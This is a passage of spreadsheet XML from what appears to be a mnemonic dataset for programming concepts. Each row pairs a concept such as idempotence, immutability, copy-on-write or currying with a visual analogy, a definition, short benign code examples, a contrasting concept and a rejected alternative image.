          <t>Purity — a property of functions; referential transparency is the property of expressions that purity buys.</t>
        </is>
      </c>
      <c r="H334" t="inlineStr">
        <is>
          <t>Secretly swapping identical twins (rejected: substitution shown but 'transparent' unencoded).</t>
        </is>
      </c>
      <c r="J334" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K334" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" t="n">
        <v>0</v>
      </c>
      <c r="B335" t="inlineStr">
        <is>
          <t>333</t>
        </is>
      </c>
      <c r="C335" t="inlineStr">
        <is>
          <t>Idempotence</t>
        </is>
      </c>
      <c r="D335" t="inlineStr">
        <is>
          <t>An elevator button already glowing: mash it five more times and the elevator's plan does not change. The first press did everything.</t>
        </is>
      </c>
      <c r="E335" t="inlineStr">
        <is>
          <t>Applying an operation more than once has the same effect as applying it once — f(f(x)) == f(x); safe to retry.</t>
        </is>
      </c>
      <c r="F335" t="inlineStr">
        <is>
          <t>abs(abs(-5)) == abs(-5) / PUT /users/7 {name: 'Ann'} # retry-safe / s.add(3); s.add(3) # set unchanged</t>
        </is>
      </c>
      <c r="G335" t="inlineStr">
        <is>
          <t>Purity — no effects at all; an idempotent operation may have an effect, just one that never compounds.</t>
        </is>
      </c>
      <c r="H335" t="inlineStr">
        <is>
          <t>Crosswalk button (rejected: same image with a weaker light cue).</t>
        </is>
      </c>
      <c r="J335" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K335" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" t="n">
        <v>0</v>
      </c>
      <c r="B336" t="inlineStr">
        <is>
          <t>334</t>
        </is>
      </c>
      <c r="C336" t="inlineStr">
        <is>
          <t>Hidden inputs</t>
        </is>
      </c>
      <c r="D336" t="inlineStr">
        <is>
          <t>A magician's 'empty' hat with a trapdoor to backstage: which rabbit he pulls depends entirely on who is crouching under the table tonight.</t>
        </is>
      </c>
      <c r="E336" t="inlineStr">
        <is>
          <t>Sneaky dependencies — globals, clocks, randomness, environment — that vary a function's result while its parameter list looks innocent.</t>
        </is>
      </c>
      <c r="F336" t="inlineStr">
        <is>
          <t>def greet(): return 'Hi ' + CURRENT_USER # global / def stamp(): return time.time() # clock</t>
        </is>
      </c>
      <c r="G336" t="inlineStr">
        <is>
          <t>Explicit parameters — visible in the signature; hidden inputs bypass it and break testability.</t>
        </is>
      </c>
      <c r="H336" t="inlineStr">
        <is>
          <t>Iceberg under a rowboat (rejected: hiddenness without variability).</t>
        </is>
      </c>
      <c r="J336" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K336" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" t="n">
        <v>0</v>
      </c>
      <c r="B337" t="inlineStr">
        <is>
          <t>335</t>
        </is>
      </c>
      <c r="C337" t="inlineStr">
        <is>
          <t>Memoization</t>
        </is>
      </c>
      <c r="D337" t="inlineStr">
        <is>
          <t>A barista scribbles your exact order on a memo stuck to the machine; next time you walk in, your cup is already waiting on the counter.</t>
        </is>
      </c>
      <c r="E337" t="inlineStr">
        <is>
          <t>Caching a function's results keyed by its arguments so repeat calls return instantly; only safe when the function is pure.</t>
        </is>
      </c>
      <c r="F337" t="inlineStr">
        <is>
          <t>@lru_cache / def fib(n): return n if n &lt; 2 else fib(n-1) + fib(n-2) / fib(300) # instant on repeat</t>
        </is>
      </c>
      <c r="G337" t="inlineStr">
        <is>
          <t>I/O caching — stores fetched data blocks; memoization stores computed results per argument tuple.</t>
        </is>
      </c>
      <c r="H337" t="inlineStr">
        <is>
          <t>Photographic memory (rejected: invites the 'memorization' misspelling it should prevent).</t>
        </is>
      </c>
      <c r="J337" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K337" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" t="n">
        <v>0</v>
      </c>
      <c r="B338" t="inlineStr">
        <is>
          <t>336</t>
        </is>
      </c>
      <c r="C338" t="inlineStr">
        <is>
          <t>Purity aids testing</t>
        </is>
      </c>
      <c r="D338" t="inlineStr">
        <is>
          <t>Testing a padlock on a bare table: key in, click, done — versus testing a house alarm that needs the whole house wired, armed, and a stunt burglar hired.</t>
        </is>
      </c>
      <c r="E338" t="inlineStr">
        <is>
          <t>Pure functions need no mocks, setup, or teardown — pass arguments, assert on the return value, done.</t>
        </is>
      </c>
      <c r="F338" t="inlineStr">
        <is>
          <t>assert price_with_tax(100, 0.2) == 120 # no db, no mocks, no fixtures</t>
        </is>
      </c>
      <c r="G338" t="inlineStr">
        <is>
          <t>Integration tests — exercise wiring and effects; purity shrinks tests to input/output checks.</t>
        </is>
      </c>
      <c r="H338" t="inlineStr">
        <is>
          <t>Lab rat in a clean cage (rejected: unpleasant animal-testing image).</t>
        </is>
      </c>
      <c r="J338" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K338" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" t="n">
        <v>0</v>
      </c>
      <c r="B339" t="inlineStr">
        <is>
          <t>337</t>
        </is>
      </c>
      <c r="C339" t="inlineStr">
        <is>
          <t>Purity aids parallelism</t>
        </is>
      </c>
      <c r="D339" t="inlineStr">
        <is>
          <t>A thousand chefs, each with their own cutting board and own onion: no shared pan, so nobody queues and no elbows collide — dinner in one chop.</t>
        </is>
      </c>
      <c r="E339" t="inlineStr">
        <is>
          <t>With no shared mutable state or effects, pure calls can run in any order or simultaneously — no locks, races, or coordination.</t>
        </is>
      </c>
      <c r="F339" t="inlineStr">
        <is>
          <t>pool.map(render_tile, tiles) # safe: render_tile is pure</t>
        </is>
      </c>
      <c r="G339" t="inlineStr">
        <is>
          <t>Locking — serializes access to shared state; purity removes the shared state entirely.</t>
        </is>
      </c>
      <c r="H339" t="inlineStr">
        <is>
          <t>Parallel swimming lanes (rejected: lanes still share the pool water).</t>
        </is>
      </c>
      <c r="J339" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K339" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" t="n">
        <v>0</v>
      </c>
      <c r="B340" t="inlineStr">
        <is>
          <t>338</t>
        </is>
      </c>
      <c r="C340" t="inlineStr">
        <is>
          <t>Command-query separation</t>
        </is>
      </c>
      <c r="D340" t="inlineStr">
        <is>
          <t>A library with two desks: the silent reading desk only answers questions; the stamping desk only stamps and never speaks. The clerk who does both loses books.</t>
        </is>
      </c>
      <c r="E340" t="inlineStr">
        <is>
          <t>Each function should either perform an effect (command, returns nothing) or answer a question (query, changes nothing) — never both.</t>
        </is>
      </c>
      <c r="F340" t="inlineStr">
        <is>
          <t>items.pop() # violates CQS: mutates AND returns / top = items[-1]; del items[-1] # split</t>
        </is>
      </c>
      <c r="G340" t="inlineStr">
        <is>
          <t>CQRS — an architecture-level split of read and write models; CQS is the function-level rule.</t>
        </is>
      </c>
      <c r="H340" t="inlineStr">
        <is>
          <t>Ask vs tell parenting (rejected: abstract, no penalty encoded).</t>
        </is>
      </c>
      <c r="J340" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K340" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" t="n">
        <v>0</v>
      </c>
      <c r="B341" t="inlineStr">
        <is>
          <t>339</t>
        </is>
      </c>
      <c r="C341" t="inlineStr">
        <is>
          <t>Functional core, imperative shell</t>
        </is>
      </c>
      <c r="D341" t="inlineStr">
        <is>
          <t>An egg: the golden yolk (pure logic) never touches the world; only the shell meets the carton, the pan, and your dirty hands.</t>
        </is>
      </c>
      <c r="E341" t="inlineStr">
        <is>
          <t>Put decisions in a pure core and push all I/O and mutation to a thin outer shell that feeds the core and enacts its results.</t>
        </is>
      </c>
      <c r="F341" t="inlineStr">
        <is>
          <t>data = read_file(p) # shell / plan = decide(data) # pure core / write_file(q, plan) # shell</t>
        </is>
      </c>
      <c r="G341" t="inlineStr">
        <is>
          <t>Hexagonal architecture — the same spirit at system scale, with ports and adapters at the edges.</t>
        </is>
      </c>
      <c r="H341" t="inlineStr">
        <is>
          <t>Castle with a pure king inside (rejected: royalty adds no mechanism).</t>
        </is>
      </c>
      <c r="J341" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K341" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" t="n">
        <v>0</v>
      </c>
      <c r="B342" t="inlineStr">
        <is>
          <t>340</t>
        </is>
      </c>
      <c r="C342" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
      <c r="D342" t="inlineStr">
        <is>
          <t>Words carved in granite: to fix a typo the mason carves an entirely new slab, and the old stone stands unchanged in the plaza forever.</t>
        </is>
      </c>
      <c r="E342" t="inlineStr">
        <is>
          <t>Once created, a value never changes; any 'modification' produces a new value, eliminating aliasing and concurrency bugs at the root.</t>
        </is>
      </c>
      <c r="F342" t="inlineStr">
        <is>
          <t>s = 'cat' / s.upper() # returns 'CAT'; s is still 'cat' / (1, 2)[0] = 9 # TypeError</t>
        </is>
      </c>
      <c r="G342" t="inlineStr">
        <is>
          <t>Constant/final binding — the name cannot be rebound, but the object it points to may still mutate.</t>
        </is>
      </c>
      <c r="H342" t="inlineStr">
        <is>
          <t>Insect trapped in amber (rejected: preservation without the new-copy half).</t>
        </is>
      </c>
      <c r="J342" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K342" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" t="n">
        <v>0</v>
      </c>
      <c r="B343" t="inlineStr">
        <is>
          <t>341</t>
        </is>
      </c>
      <c r="C343" t="inlineStr">
        <is>
          <t>Value semantics</t>
        </is>
      </c>
      <c r="D343" t="inlineStr">
        <is>
          <t>A photocopier bolted to the office doorway: every document handed through comes out a fresh copy, so scribbling on yours never defaces mine.</t>
        </is>
      </c>
      <c r="E343" t="inlineStr">
        <is>
          <t>Assignment and passing copy the VALUE, so no two names can share mutable state - what you hold is yours alone, as with ints and strings.</t>
        </is>
      </c>
      <c r="F343" t="inlineStr">
        <is>
          <t>a = 5; b = a; b += 1  # a still 5 / C++: vector&lt;int&gt; v2 = v1;  // independent copy</t>
        </is>
      </c>
      <c r="G343" t="inlineStr">
        <is>
          <t>vs reference semantics / aliasing (099): references share one object; values are independent copies</t>
        </is>
      </c>
      <c r="H343" t="inlineStr">
        <is>
          <t>wax seal stamping identical impressions</t>
        </is>
      </c>
      <c r="J343" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K343" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" t="n">
        <v>0</v>
      </c>
      <c r="B344" t="inlineStr">
        <is>
          <t>342</t>
        </is>
      </c>
      <c r="C344" t="inlineStr">
        <is>
          <t>Immutable collections</t>
        </is>
      </c>
      <c r="D344" t="inlineStr">
        <is>
          <t>A museum case of butterflies pinned under glass: anyone may look, photograph, and pass it around the room; nobody's fingers get inside.</t>
        </is>
      </c>
      <c r="E344" t="inlineStr">
        <is>
          <t>Collection types that reject all in-place modification — tuple, frozenset, frozen dataclasses — making them safely shareable and hashable.</t>
        </is>
      </c>
      <c r="F344" t="inlineStr">
        <is>
          <t>point = (3, 4) / fs = frozenset({1, 2}); fs | {3} # new set / @dataclass(frozen=True)</t>
        </is>
      </c>
      <c r="G344" t="inlineStr">
        <is>
          <t>Read-only view — a window onto data someone else may still mutate; immutable collections cannot change at all.</t>
        </is>
      </c>
      <c r="H344" t="inlineStr">
        <is>
          <t>Snow globe (rejected: you can shake it — motion contradicts).</t>
        </is>
      </c>
      <c r="J344" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K344" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" t="n">
        <v>0</v>
      </c>
      <c r="B345" t="inlineStr">
        <is>
          <t>343</t>
        </is>
      </c>
      <c r="C345" t="inlineStr">
        <is>
          <t>Freeze and readonly</t>
        </is>
      </c>
      <c r="D345" t="inlineStr">
        <is>
          <t>A flash-freeze ray zaps a wriggling octopus solid mid-gesture: poke all you want, no tentacle budges — but the frost is only skin-deep (shallow).</t>
        </is>
      </c>
      <c r="E345" t="inlineStr">
        <is>
          <t>Language switches that lock existing objects or fields against writes — Object.freeze in JS, readonly in TS/C#, final fields in Java.</t>
        </is>
      </c>
      <c r="F345" t="inlineStr">
        <is>
          <t>const cfg = Object.freeze({port: 80}); / cfg.port = 99; // ignored (throws in strict) / cfg.nested.x = 1; // still works: shallow!</t>
        </is>
      </c>
      <c r="G345" t="inlineStr">
        <is>
          <t>const (JS) — freezes the binding, not the object; a const object's fields stay writable without freeze.</t>
        </is>
      </c>
      <c r="H345" t="inlineStr">
        <is>
          <t>Wax seal on a letter (rejected: opening breaks it; freeze cannot be broken).</t>
        </is>
      </c>
      <c r="J345" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K345" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" t="n">
        <v>0</v>
      </c>
      <c r="B346" t="inlineStr">
        <is>
          <t>344</t>
        </is>
      </c>
      <c r="C346" t="inlineStr">
        <is>
          <t>Defensive copy</t>
        </is>
      </c>
      <c r="D346" t="inlineStr">
        <is>
          <t>The museum hands visitors a replica sword to swing around while the real blade stays in the vault; scratch the copy all you like.</t>
        </is>
      </c>
      <c r="E346" t="inlineStr">
        <is>
          <t>Copy mutable data at trust boundaries — going into and out of your object — so outsiders holding a reference cannot mutate your internals.</t>
        </is>
      </c>
      <c r="F346" t="inlineStr">
        <is>
          <t>def __init__(self, tags): / self._tags = list(tags) # copy in / def tags(self): return list(self._tags) # copy out</t>
        </is>
      </c>
      <c r="G346" t="inlineStr">
        <is>
          <t>Immutable types — make copying unnecessary; defensive copies are the workaround when stuck with mutables.</t>
        </is>
      </c>
      <c r="H346" t="inlineStr">
        <is>
          <t>Fencing with a shield (rejected: 'defensive' pun but no copy).</t>
        </is>
      </c>
      <c r="J346" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K346" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" t="n">
        <v>0</v>
      </c>
      <c r="B347" t="inlineStr">
        <is>
          <t>345</t>
        </is>
      </c>
      <c r="C347" t="inlineStr">
        <is>
          <t>Shallow vs deep copy</t>
        </is>
      </c>
      <c r="D347" t="inlineStr">
        <is>
          <t>Photocopying a binder of house keys: the shallow copy reproduces the pages but the taped-on keys still open the ORIGINAL doors; the deep copy re-cuts every key.</t>
        </is>
      </c>
      <c r="E347" t="inlineStr">
        <is>
          <t>A shallow copy duplicates only the outer container, still sharing inner objects; a deep copy recursively duplicates everything.</t>
        </is>
      </c>
      <c r="F347" t="inlineStr">
        <is>
          <t>import copy / b = copy.copy(a) # inner lists shared / c = copy.deepcopy(a) # fully independent</t>
        </is>
      </c>
      <c r="G347" t="inlineStr">
        <is>
          <t>Assignment (b = a) — copies nothing, just adds a name; even a shallow copy makes a new outer object.</t>
        </is>
      </c>
      <c r="H347" t="inlineStr">
        <is>
          <t>Kiddie pool vs deep-sea dive (rejected: depth pun, no sharing shown).</t>
        </is>
      </c>
      <c r="J347" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K347" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" t="n">
        <v>0</v>
      </c>
      <c r="B348" t="inlineStr">
        <is>
          <t>346</t>
        </is>
      </c>
      <c r="C348" t="inlineStr">
        <is>
          <t>Non-destructive update</t>
        </is>
      </c>
      <c r="D348" t="inlineStr">
        <is>
          <t>A film editor never cuts the negative: every edit prints a fresh reel with one scene swapped, and the archive keeps every prior version.</t>
        </is>
      </c>
      <c r="E348" t="inlineStr">
        <is>
          <t>Produce a modified copy instead of mutating in place — spread syntax, dataclasses.replace — leaving the original intact for other holders.</t>
        </is>
      </c>
      <c r="F348" t="inlineStr">
        <is>
          <t>new = {**old, 'port': 8080} / p2 = dataclasses.replace(p, x=5) / nums2 = nums + [7]</t>
        </is>
      </c>
      <c r="G348" t="inlineStr">
        <is>
          <t>In-place mutation — cheaper, but changes the value under every alias simultaneously.</t>
        </is>
      </c>
      <c r="H348" t="inlineStr">
        <is>
          <t>Ship of Theseus (rejected: philosophy overload, wrong lesson).</t>
        </is>
      </c>
      <c r="J348" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K348" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" t="n">
        <v>0</v>
      </c>
      <c r="B349" t="inlineStr">
        <is>
          <t>347</t>
        </is>
      </c>
      <c r="C349" t="inlineStr">
        <is>
          <t>Structural sharing</t>
        </is>
      </c>
      <c r="D349" t="inlineStr">
        <is>
          <t>Two treehouses in the same living oak: the new one adds a single fresh branch and plank, and both stand safely on the same old trunk.</t>
        </is>
      </c>
      <c r="E349" t="inlineStr">
        <is>
          <t>New versions of immutable structures reuse the unchanged parts of the old one, so a 'copy' costs only the changed path, not the whole.</t>
        </is>
      </c>
      <c r="F349" t="inlineStr">
        <is>
          <t>new = old.set_in('user.name', 'Ann') / # only that path rebuilt; ~99% of nodes shared</t>
        </is>
      </c>
      <c r="G349" t="inlineStr">
        <is>
          <t>Shallow copy — also shares innards, but mutable ones; sharing is only safe because the parts cannot change.</t>
        </is>
      </c>
      <c r="H349" t="inlineStr">
        <is>
          <t>Shared sourdough starter (rejected: the starter itself changes over time).</t>
        </is>
      </c>
      <c r="J349" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K349" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" t="n">
        <v>0</v>
      </c>
      <c r="B350" t="inlineStr">
        <is>
          <t>348</t>
        </is>
      </c>
      <c r="C350" t="inlineStr">
        <is>
          <t>Persistent data structures</t>
        </is>
      </c>
      <c r="D350" t="inlineStr">
        <is>
          <t>A video game save-tree: every move spawns a new save slot, and you can reload any past save forever — storage barely grows because saves share the world.</t>
        </is>
      </c>
      <c r="E350" t="inlineStr">
        <is>
          <t>Immutable collections where every update returns a new version and all old versions remain valid and cheap, via structural sharing.</t>
        </is>
      </c>
      <c r="F350" t="inlineStr">
        <is>
          <t>v2 = v1.append(42) # Clojure/pyrsistent vector / v1 # the old sequence, untouched and usable</t>
        </is>
      </c>
      <c r="G350" t="inlineStr">
        <is>
          <t>'Persistent' as saved-to-disk — unrelated; here it means old versions persist in memory.</t>
        </is>
      </c>
      <c r="H350" t="inlineStr">
        <is>
          <t>Photo album of every day (rejected: linear full copies, no sharing).</t>
        </is>
      </c>
      <c r="J350" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K350" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" t="n">
        <v>0</v>
      </c>
      <c r="B351" t="inlineStr">
        <is>
          <t>349</t>
        </is>
      </c>
      <c r="C351" t="inlineStr">
        <is>
          <t>Copy-on-write</t>
        </is>
      </c>
      <c r="D351" t="inlineStr">
        <is>
          <t>Roommates share one streaming profile until the day one rates a movie — at that click the account instantly splits into two profiles so the stain lands on theirs alone.</t>
        </is>
      </c>
      <c r="E351" t="inlineStr">
        <is>
          <t>Share one underlying buffer between 'copies' and physically duplicate it only at the moment someone first writes.</t>
        </is>
      </c>
      <c r="F351" t="inlineStr">
        <is>
          <t>pid = os.fork() # memory pages shared until a write / df2 = df.copy() # pandas CoW: real copy deferred</t>
        </is>
      </c>
      <c r="G351" t="inlineStr">
        <is>
          <t>Eager defensive copy — pays the duplication cost up front; CoW defers it and often never pays.</t>
        </is>
      </c>
      <c r="H351" t="inlineStr">
        <is>
          <t>Photocopier that only prints when you scribble (rejected: circular description).</t>
        </is>
      </c>
      <c r="J351" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K351" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" t="n">
        <v>0</v>
      </c>
      <c r="B352" t="inlineStr">
        <is>
          <t>350</t>
        </is>
      </c>
      <c r="C352" t="inlineStr">
        <is>
          <t>Function composition</t>
        </is>
      </c>
      <c r="D352" t="inlineStr">
        <is>
          <t>Three garden hoses screwed end to end: water enters the far nozzle and passes through every segment before hitting the roses. Compose reads right-to-left — water enters at the LAST hose named.</t>
        </is>
      </c>
      <c r="E352" t="inlineStr">
        <is>
          <t>Combining functions so one's output feeds the next — compose(f, g)(x) = f(g(x)) — building big behavior from small parts.</t>
        </is>
      </c>
      <c r="F352" t="inlineStr">
        <is>
          <t>compose = lambda f, g: lambda x: f(g(x)) / slug = compose(str.lower, str.strip) / slug(' HeLLo ') # 'hello'</t>
        </is>
      </c>
      <c r="G352" t="inlineStr">
        <is>
          <t>Pipe — the same chaining written left-to-right in reading order; compose is right-to-left math order.</t>
        </is>
      </c>
      <c r="H352" t="inlineStr">
        <is>
          <t>Composer stacking sheet music (rejected: name pun, no data flow).</t>
        </is>
      </c>
      <c r="J352" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K352" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" t="n">
        <v>0</v>
      </c>
      <c r="B353" t="inlineStr">
        <is>
          <t>351</t>
        </is>
      </c>
      <c r="C353" t="inlineStr">
        <is>
          <t>Pipe</t>
        </is>
      </c>
      <c r="D353" t="inlineStr">
        <is>
          <t>A water slide with three drops in the order you will actually fall: from the ladder you can narrate your whole ride top to bottom.</t>
        </is>
      </c>
      <c r="E353" t="inlineStr">
        <is>
          <t>Left-to-right composition: pipe(f, g, h)(x) runs f first, reading in execution order — x |&gt; f |&gt; g in Elixir and F#.</t>
        </is>
      </c>
      <c r="F353" t="inlineStr">
        <is>
          <t>"hello" |&gt; String.upcase |&gt; String.reverse # Elixir: OLLEH</t>
        </is>
      </c>
      <c r="G353" t="inlineStr">
        <is>
          <t>compose — identical chaining, opposite reading order (right-to-left).</t>
        </is>
      </c>
      <c r="H353" t="inlineStr">
        <is>
          <t>Plumber's pipe (rejected: identical to the unix-pipe anchor next door).</t>
        </is>
      </c>
      <c r="J353" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K353" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" t="n">
        <v>0</v>
      </c>
      <c r="B354" t="inlineStr">
        <is>
          <t>352</t>
        </is>
      </c>
      <c r="C354" t="inlineStr">
        <is>
          <t>Unix pipe analogy</t>
        </is>
      </c>
      <c r="D354" t="inlineStr">
        <is>
          <t>A sushi conveyor through three chefs' stations — one slices, one rolls, one wraps; no chef knows the others exist, the belt is the only contract.</t>
        </is>
      </c>
      <c r="E354" t="inlineStr">
        <is>
          <t>Shell pipelines are function composition over text streams: each small program reads stdin, transforms, writes stdout.</t>
        </is>
      </c>
      <c r="F354" t="inlineStr">
        <is>
          <t>cat log.txt | grep ERROR | sort | uniq -c | head</t>
        </is>
      </c>
      <c r="G354" t="inlineStr">
        <is>
          <t>Method chaining — flows through one object's API; unix pipes connect independent programs via a byte stream.</t>
        </is>
      </c>
      <c r="H354" t="inlineStr">
        <is>
          <t>Factory assembly line (rejected: default cliche for pipelines).</t>
        </is>
      </c>
      <c r="J354" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K354" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" t="n">
        <v>0</v>
      </c>
      <c r="B355" t="inlineStr">
        <is>
          <t>353</t>
        </is>
      </c>
      <c r="C355" t="inlineStr">
        <is>
          <t>Point-free style</t>
        </is>
      </c>
      <c r="D355" t="inlineStr">
        <is>
          <t>A conductor wearing fingerless mittens sewn shut: the music flows through the whole orchestra though no finger ever points at any player (no argument named).</t>
        </is>
      </c>
      <c r="E355" t="inlineStr">
        <is>
          <t>Defining functions purely by composing others, never naming the data argument — 'point' is the argument, from topology.</t>
        </is>
      </c>
      <c r="F355" t="inlineStr">
        <is>
          <t>sumSquares = sum . map (^2) -- Haskell: no xs anywhere / -- vs sumSquares xs = sum (map (^2) xs)</t>
        </is>
      </c>
      <c r="G355" t="inlineStr">
        <is>
          <t>Pointer-free memory — unrelated; the 'point' being dropped is the function's argument.</t>
        </is>
      </c>
      <c r="H355" t="inlineStr">
        <is>
          <t>Dot-to-dot puzzle with no dots (rejected: paradox without meaning).</t>
        </is>
      </c>
      <c r="J355" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K355" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" t="n">
        <v>0</v>
      </c>
      <c r="B356" t="inlineStr">
        <is>
          <t>354</t>
        </is>
      </c>
      <c r="C356" t="inlineStr">
        <is>
          <t>Arity</t>
        </is>
      </c>
      <c r="D356" t="inlineStr">
        <is>
          <t>An airy ('AR-ity') pipe organ where each pipe has a fixed number of finger holes — one, two, or three — and sounds only when exactly that many fingers press.</t>
        </is>
      </c>
      <c r="E356" t="inlineStr">
        <is>
          <t>The number of arguments a function accepts: unary takes 1, binary 2, ternary 3; variadic means the count is unfixed.</t>
        </is>
      </c>
      <c r="F356" t="inlineStr">
        <is>
          <t>len(x) # arity 1 / pow(x, y) # arity 2 / print(*args) # variadic</t>
        </is>
      </c>
      <c r="G356" t="inlineStr">
        <is>
          <t>Parity — one-letter neighbor; arity counts parameters, parity classifies integers as odd or even.</t>
        </is>
      </c>
      <c r="H356" t="inlineStr">
        <is>
          <t>Aristocrat counting servants (rejected: 'ari' pun too oblique).</t>
        </is>
      </c>
      <c r="J356" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K356" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" t="n">
        <v>0</v>
      </c>
      <c r="B357" t="inlineStr">
        <is>
          <t>355</t>
        </is>
      </c>
      <c r="C357" t="inlineStr">
        <is>
          <t>Partial application</t>
        </is>
      </c>
      <c r="D357" t="inlineStr">
        <is>
          <t>A half-built sandwich behind the counter — bread and cheese already on, wrapped with a sticky note 'awaiting meat'; hand over the last ingredient any day and lunch completes.</t>
        </is>
      </c>
      <c r="E357" t="inlineStr">
        <is>
          <t>Fixing some of a function's arguments now to get a new function of smaller arity awaiting the rest.</t>
        </is>
      </c>
      <c r="F357" t="inlineStr">
        <is>
          <t>from functools import partial / log_err = partial(log, level='ERROR') / log_err('disk full')</t>
        </is>
      </c>
      <c r="G357" t="inlineStr">
        <is>
          <t>Currying — restructures a function to take arguments one at a time; partial just pre-fills some now.</t>
        </is>
      </c>
      <c r="H357" t="inlineStr">
        <is>
          <t>House down payment (rejected: financial, weak sensory).</t>
        </is>
      </c>
      <c r="J357" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K357" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" t="n">
        <v>0</v>
      </c>
      <c r="B358" t="inlineStr">
        <is>
          <t>356</t>
        </is>
      </c>
      <c r="C358" t="inlineStr">
        <is>
          <t>Currying</t>
        </is>
      </c>
      <c r="D358" t="inlineStr">
        <is>
          <t>A curry house that accepts one spice at a time: hand over cumin and get back a chef who now wants coriander; only after the final spice does dinner appear.</t>
        </is>
      </c>
      <c r="E358" t="inlineStr">
        <is>
          <t>Transforming an n-argument function into a chain of one-argument functions: f(a, b, c) becomes f(a)(b)(c).</t>
        </is>
      </c>
      <c r="F358" t="inlineStr">
        <is>
          <t>curried = lambda a: lambda b: lambda c: a + b + c / curried(1)(2)(3) # 6</t>
        </is>
      </c>
      <c r="G358" t="inlineStr">
        <is>
          <t>Partial application — pre-fills some args of a normal function once; currying rebuilds it into unary steps.</t>
        </is>
      </c>
      <c r="H358" t="inlineStr">
        <is>
          <t>Portrait of Haskell Curry (rejected: correct etymology, zero mechanism).</t>
        </is>
      </c>
      <c r="J358" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K358" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" t="n">
        <v>0</v>
      </c>
      <c r="B359" t="inlineStr">
        <is>
          <t>357</t>
        </is>
      </c>
